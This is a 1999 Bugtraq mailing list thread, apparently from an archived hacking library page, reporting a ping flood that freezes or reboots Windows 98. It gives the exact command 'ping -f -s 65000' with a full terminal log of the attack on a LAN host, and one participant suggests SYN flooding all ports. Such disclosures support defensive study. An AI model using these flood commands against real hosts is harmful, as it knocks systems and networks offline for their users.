Date: Wed, 17 Feb 1999 03:17:26 -0300
From: Fabio Bastiglia Oliva 
To: BUGTRAQ@netspace.org
Subject: Pingflood attack against Windows98

rewt wrote:
>
> Try pinging the windows box with large amounts of icmp...I left 5
> screened pings, each set to 65000 size...Windows will freeze shortly
> after it's loaded. You might also try to ping with -f.
>

Hey...
        I did what you suggested, and it's true... But in my case the
results were a little worse than yours...
        Windows 98 *REBOOTED* after a ping -f 65000... and there was no
need to make several screen boxes... With only one ping -f 65000 the system
rebooted.

Best Regards
-------------------------------
Fabio Bastiglia Oliva - Director
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

----------------------------------------------------------------------

Date: Thu, 18 Feb 1999 13:32:00 -0500
From: Mark A. Heilpern 
To: BUGTRAQ@netspace.org
Subject: Re: Pingflood attack against Windows98

At 03:17 AM 2/17/99 -0300, you wrote:
>rewt wrote:
>>
>> Try pinging the windows box with large amounts of icmp...I left 5
>> screened pings, each set to 65000 size...Windows will freeze shortly
>> after it's loaded. You might also try to ping with -f.
>>
>
>Hey...
>       I did what you suggested, and it's true... But in my case the
>results were a little worse than yours...
>       Windows 98 *REBOOTED* after a ping -f 65000... and there was no
>need to make several screen boxes... With only one ping -f 65000 the system
>rebooted.

I issued "ping -f -s 65000 my-win98-address" and after a single return, win98
locked up cold. I was ssh'd from win98 to linux to issue the ping, so I might
have had more returns than timing allowed to be displayed before I locked
up.

----------------------------------------------------------------------

Date: Thu, 18 Feb 1999 21:44:24 -0300
From: Fabio Bastiglia Oliva 
To: BUGTRAQ@netspace.org
Subject: Re: Pingflood attack against Windows98

Hello all,

        As I said before, forgive me, because my English is not so good!
        I'll do a "Multi-reply" in this email... It's easier ;)
        Thanks for all the replies!

------------------------------------------------------------------------
------------------------------------------------------------------------
James  wrote:
>
> This on a LAN or Internet or both?
>

        I did this test on my LAN.

-LAN Speed: 10Mbits.
-NICs (Network Interface Card): 3Com905btx, Genius, Encore & Realtek.
-Hubs: 3Com Super Stack II.
-Windows98 Versions: 4.10.1998 (Portuguese and English versions)

------------------------------------------------------------------------
------------------------------------------------------------------------
Laurent LEVIER  wrote:
>
> I tried with the French version of Windows 98.
>
> when I run ping -l 65000 -f IPaddr.
>
> ping refuses. Of course ping -f 65000 is not accepted too.
>
> Strange the ping command changes between US & FR version.
>

        Sorry, I made a mistake when I sent the email to Bugtraq. The
correct command line (from Linux Slackware 3.6, Kernel 2.0.36) is:

                ping -f -s 65000 IPaddr

------------------------------------------------------------------------
------------------------------------------------------------------------
Quantum  wrote:
>
> I just tried it & had no success at my Win98 dos prompt,
>

        Try from a linux... I got these results flooding from a
Linux Slackware 3.6 Kernel 2.0.36...

------------------------------------------------------------------------
------------------------------------------------------------------------
Tom Van Riper wrote:
>
> yeah no kidding, the world has known a dialup connection whether it be
> windows or a unix type operating system, that a small amount of icmp
> packets will kill the connection for years, that's old stuff.
> try synflooding on ports 0-65535 for some real fun ;)

        Hehe... But a synflood just made the LAN communication slower,
and didn't affect Windows 98 the way the pingflood did!

Tom Van Riper
Dreamscape Online

------------------------------------------------------------------------

Best Regards
-------------------------------
Fabio Bastiglia Oliva - Director
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

----------------------------------------------------------------------

Date: Fri, 19 Feb 1999 01:16:44 -0300
From: Fabio Bastiglia Oliva 
To: BUGTRAQ@netspace.org
Subject: Pingflood attack against Windows98 - The Test

Hello all,

         This is what happens when I ping flood a Windows98 machine from a
Linux Slackware 3.6 (Kernel 2.0.36).


-Before the attack-

linux:~# ping 192.168.1.4
PING 192.168.1.4 (192.168.1.4): 56 data bytes
64 bytes from 192.168.1.4: icmp_seq=0 ttl=128 time=0.5 ms
64 bytes from 192.168.1.4: icmp_seq=1 ttl=128 time=0.5 ms

--- 192.168.1.4 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.5/0.5/0.5 ms


-The Attack-

linux:~# ping -f -s 65000 192.168.1.4
PING 192.168.1.3 (192.168.1.4): 65000 data bytes
.......................................................................
...................................................../*After lots of
little dots... Windows98 Rebooted*/...

--- 192.168.1.4 ping statistics ---
11440 packets transmitted, 228 packets received, 98% packet loss
round-trip min/avg/max = 0.6/32.0/64.2 ms


-After the attack-

linux:~# ping 192.168.1.4
PING 192.168.1.4 (192.168.1.4): 56 data bytes

--- 192.168.1.4 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss

---

        That's what's happening here... Did any of you get the same
results?

Best Regards
--------------------------------
Fabio Bastiglia Oliva - Director
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

    Source: geocities.com/dharan6/library/hack99
